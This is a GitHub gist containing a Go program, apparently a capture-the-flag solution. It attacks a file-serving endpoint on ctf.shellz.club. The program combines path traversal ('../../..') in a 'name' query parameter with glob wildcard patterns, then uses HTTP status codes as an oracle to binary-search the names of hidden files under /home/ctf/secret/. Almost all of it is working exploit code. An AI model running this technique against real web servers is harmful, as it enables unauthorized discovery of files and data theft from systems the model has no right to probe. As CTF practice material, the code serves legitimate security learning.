Created
May 19, 2021 12:08
-
-
Save Acebond/6f655ce1bcb3251a6704bf6c62157af2 to your computer and use it in GitHub Desktop.
glob_search
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"fmt" | |
"log" | |
"net/http" | |
"os" | |
"strings" | |
// "net/url" | |
) | |
var ( | |
target = "ctf.shellz.club:8081" | |
path = "/file" | |
// /var/apache2/cgi-bin/ | |
query = "name=../../.././../../../../../../INJECTION" | |
searchFolder = "/home/ctf/secret/" | |
searchSpace = "AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz.123456789%20_" | |
maxFileLength = 30 | |
//errorResponse = []byte("That log file doesn't exist") | |
) | |
func formatURL(injection string) string { | |
URL := "http://" + target + path + "?" + query | |
URL = strings.Replace(URL, "INJECTION", searchFolder+injection, 1) | |
return URL | |
} | |
func isValidFile(filename string) bool { | |
URL := formatURL(filename) | |
resp, err := http.Get(URL) | |
if err != nil { | |
log.Panicln(err.Error()) | |
} | |
//defer resp.Body.Close() | |
//respBody, _ := ioutil.ReadAll(resp.Body) | |
return resp.StatusCode == http.StatusOK | |
//return !bytes.Contains(respBody, errorResponse) | |
} | |
func binarySearchLetters(currentFilename string, searchSpace string, length int, results *[]string) { | |
if len(searchSpace) == 1 { | |
*results = append(*results, searchSpace) | |
return | |
} | |
split := len(searchSpace) / 2 | |
pattern := "" | |
pattern = fmt.Sprintf("%s[%s]%s", currentFilename, searchSpace[:split], strings.Repeat("?", length-len(currentFilename)-1)) | |
if isValidFile(pattern) { | |
binarySearchLetters(currentFilename, searchSpace[:split], length, results) | |
} | |
pattern = fmt.Sprintf("%s[%s]%s", currentFilename, searchSpace[split:], strings.Repeat("?", length-len(currentFilename)-1)) | |
if isValidFile(pattern) { | |
binarySearchLetters(currentFilename, searchSpace[split:], length, results) | |
} | |
} | |
func findValidFiles(length int) []string { | |
log.Printf("Finding filenames with length: %d\n", length) | |
fileNames := []string{""} | |
tmpNames := []string{} | |
for i := 1; i <= length; i++ { | |
log.Println(fileNames) | |
for _, parshallName := range fileNames { | |
solutions := []string{} | |
binarySearchLetters(parshallName, searchSpace, length, &solutions) | |
//log.Printf("Solutions: %v\n", solutions) | |
for _, char := range solutions { | |
//fmt.Printf("Appending %s to tmpNames\n", parshallName + char) | |
tmpNames = append(tmpNames, parshallName+char) | |
} | |
} | |
fileNames = nil | |
fileNames = append(fileNames, tmpNames...) | |
tmpNames = nil | |
} | |
return fileNames | |
} | |
func findFiles() { | |
for len := 10; len < maxFileLength; len++ { | |
pattern := strings.Repeat("?", len) | |
if isValidFile(pattern) { | |
for _, filename := range findValidFiles(len) { | |
log.Printf("Found File: %s\n", filename) | |
} | |
} | |
} | |
} | |
func main() { | |
//flag.StringVar(&searchFolder, "path", "/var/apache2/html", "path to search") | |
//flag.Parse() | |
os.Setenv("HTTP_PROXY", "http://127.0.0.1:8080") | |
findFiles() | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment